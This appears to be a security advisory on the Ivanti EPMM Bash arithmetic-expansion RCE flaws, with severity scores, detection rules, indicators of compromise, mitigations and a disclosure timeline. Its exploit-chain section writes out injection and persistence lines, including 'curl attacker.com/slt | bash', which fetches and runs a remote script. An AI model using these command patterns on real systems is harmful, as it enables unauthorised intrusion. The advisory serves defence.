Ivanti EPMM Code Injection — Bash Arithmetic Expansion RCE

Severity Assessment

• Exploitability: 9.5/10 — Unauthenticated RCE via HTTP GET; no credentials required; PoC public within 1 day of disclosure
• Impact: 9/10 — Arbitrary OS command execution on EPMM MDM server controlling enterprise endpoint fleet
• Weaponization Risk: 9/10 — Mass automated exploitation observed; web shells, cryptominers, and backdoors deployed at scale
• Patch Urgency: 9.5/10 — CISA KEV listed; federal mandatory remediation; MDM compromise enables mass endpoint policy abuse
• Detection Coverage: 5.5/10 — Exploitation traffic blends with normal MDM API calls; web shell and cryptominer artifacts detectable post-compromise

Summary

Twin critical vulnerabilities (CVE-2026-1281 and CVE-2026-1340) in Ivanti Endpoint Manager Mobile (EPMM) allow unauthenticated remote code execution through Bash command injection. Attackers inject malicious commands via HTTP GET requests to application distribution endpoints (/mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/). The vulnerabilities exploit improper handling of attacker-controlled input within Bash scripts used by EPMM, specifically through arithmetic expansion in the map-appstore-url script.

Initially disclosed as affecting “a very limited number of customers,” Unit 42 later observed widespread automated exploitation including web shells, cryptominers, and persistent backdoors. CISA added CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) catalog on April 8, 2026. Organizations running EPMM ≤ 12.7.0.0 are at critical risk and should apply patches immediately or restrict network access to affected systems.

Exploit Chain

Target Discovery Attacker identifies internet-facing Ivanti EPMM instances via Shodan/Censys scanning or automated reconnaissance. shodan search “Ivanti EPMM” | censys search “EPMM”

Payload Crafting Malicious Bash commands are embedded in HTTP GET request parameters targeting /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/ endpoints with arithmetic expansion syntax. GET /mifs/c/appstore/fob/?param=$(command) HTTP/1.1

Arithmetic Expansion Abuse EPMM’s map-appstore-url Bash script processes attacker input through arithmetic expansion, enabling OS command injection and arbitrary code execution. $(($(malicious_command)))

Second-Stage Delivery Exploited system downloads and executes /slt script payload from attacker server, installing web shell, cryptominer, or persistent backdoor. curl attacker.com/slt | bash

Persistence Attackers establish persistent access via web shells and backdoors on compromised EPMM servers, maintaining remote access across reboots. chmod +x /var/www/shell.php && crontab -e

Detection Guidance

Detection Rule Behavioral Indicator Confidence

SIEM Rule: HTTP Parameter Analysis Monitor HTTP GET requests to /mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/ with unusual parameters High

Network Signature: Outbound Downloads Outbound connections from EPMM to unknown IPs downloading /slt script payloads High

Endpoint Indicator: Web Shell Detection Web shell files deployed on EPMM server filesystem (new PHP/JSP files in EPMM web directories) High

Process Monitor: Anomalous Child Processes Unexpected child processes spawned by EPMM application server (bash/sh spawned from Java/Tomcat process tree) High

Crypto Detection: Resource Anomalies CPU utilization spikes on EPMM servers with sustained high CPU and mining pool network connections Med

Indicators of Compromise

• Malicious HTTP GET requests to /mifs/c/appstore/fob/ or /mifs/c/aftstore/fob/ with shell metacharacters or $(...) arithmetic expansion syntax
• Outbound downloads of /slt script from EPMM server to attacker-controlled infrastructure
• Unauthorized web shell files in /var/www/, /opt/epmm/tomcat/webapps/, or temp directories
• Anomalous child processes spawned by EPMM Tomcat/Java process tree (bash/sh with unexpected arguments)
• Sustained high CPU on EPMM servers with cryptominer network connections to mining pool infrastructure

Recommended Mitigations:

1. Apply RPM Patches — Install version-specific RPM patches for EPMM 12.5.x–12.7.x immediately. Note: patches do not survive upgrades; plan full upgrade to 12.8.0.0.
2. Upgrade to 12.8.0.0 — Permanent fix for both CVE-2026-1281 and CVE-2026-1340; recommended long-term remediation.
3. Network Isolation — Restrict EPMM management interface from internet access; enforce VPN or zero-trust controls; firewall-limit inbound to trusted networks.
4. Web Shell Scan — Scan EPMM filesystem for unauthorized web shells/backdoors in web-accessible directories.
5. Monitor Exploitation Endpoints — Deploy WAF/IDS signatures to detect malicious requests with arithmetic expansion syntax targeting app distribution endpoints.

Disclosure Timeline

● 2026-01-29 Ivanti Discloses Vulnerability Ivanti discloses CVE-2026-1281 and CVE-2026-1340, noting exploitation of “a very limited number of customers.” Initial advisory recommends immediate patching.

● 2026-01-30 PoC Code Released Public proof-of-concept exploitation code becomes available, enabling broader exploitation attempts by threat actors.

● 2026-02-01 Horizon3.ai Analysis Horizon3.ai publishes detailed technical analysis and exploitation walkthrough, significantly lowering the barrier to exploitation.

● 2026-03-15 Mass Exploitation Observed Unit 42 and Deutsche Telekom Security report widespread automated mass exploitation across multiple countries, including deployment of web shells, cryptominers, and persistent backdoors.

● 2026-04-08 CISA KEV Addition CISA adds CVE-2026-1340 to the Known Exploited Vulnerabilities (KEV) catalog, officially confirming active exploitation in the wild and escalating priority for federal agencies.

Sources & References

• CISA: Known Exploited Vulnerabilities Catalog — CISA, 2026-04-08
• National Vulnerability Database: CVE-2026-1340 — National Vulnerability Database, 2026-01-29
• Ivanti: Security Advisory CVE-2026-1340 — Ivanti, 2026-01-29
• Horizon3.ai: CVE-2026-1281 and CVE-2026-1340 Ivanti EPMM Bash RCE Attack Research — Horizon3.ai, 2026-02-01
• Unit 42: Ivanti EPMM CVE-2026-1340 Mass Exploitation Analysis — Unit 42, 2026-03-15